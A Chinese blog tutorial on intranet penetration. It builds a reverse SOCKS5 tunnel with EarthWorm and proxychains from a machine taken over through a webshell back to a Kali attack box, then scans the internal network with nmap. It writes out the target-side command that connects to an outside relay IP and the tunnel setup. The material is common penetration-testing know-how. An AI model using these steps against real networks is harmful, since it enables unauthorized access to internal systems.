【内网穿透】kali中ew和proxychains联动socks5隧道

前言

  • kali中的proxychains和earthworm配合的socks5隧道技术

首先明确一点,拿到了对方的机子,但是对方是内网机子,我们无法连接对方的3389端口,得将对方内网带入我们的kali攻击机中,使我们可以直接访问对方内网ip,下面开始实施

首先利用ew将我们公网上的一个端口转发到本地4444端口中

1、反向连接

1
2
3
4
file /bin/ls //可以查看自己linux是多少位的,选择对应的earthworm工具

将3389端口接收到数据转发到本地的4444端口中
./ew_linux_x64 -s rcsocks -l 4444 -e 3389

image-20210825084807963

2、利用webshell上传ew然后用目标机访问,这个公网上打开3389端口的ip,就可以实现连接

1
2
3
目标机是windows10

ew_win32.exe -s rssocks -d 47.99.163.64 -e 3389

image-20210825084936368

看到rssocks cmd_socket OK!就代表成功了

然后利用proxychains来进行socks代理使用,由于我没有下载,所以需要下载proxychains,下面是步骤

1
2
3
4
5
6
7
8
9
10
11
从git上克隆下来
git clone
https://github.com/rofl0r/proxychains-ng.git
进入该目录
cd proxychains-ng
进行配置//如果报错下载gcc
./configure --prefix=/usr --sysconfdir=/etc
执行
make && make install
执行(到这一步就安装完成了)
make install-config

还有一个重要步骤,如下截图样式

1
vim /etc/proxychains.conf  //修改配置文件

image-20210825085232001

接着就可以直接用proxychains4代理来直接访问我们想要访问的内网

image-20210825085745456

也可以利用nmap来扫描端口,不过不能使用ping所以要禁止

1
proxychains4 nmap -Pn -sT 192.168.0.111

image-20210825091812115

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【内网穿透】kali中ew和proxychains联动socks5隧道

文章作者:孤桜懶契

发布时间:2021年08月24日 - 19:19:07

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/112.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------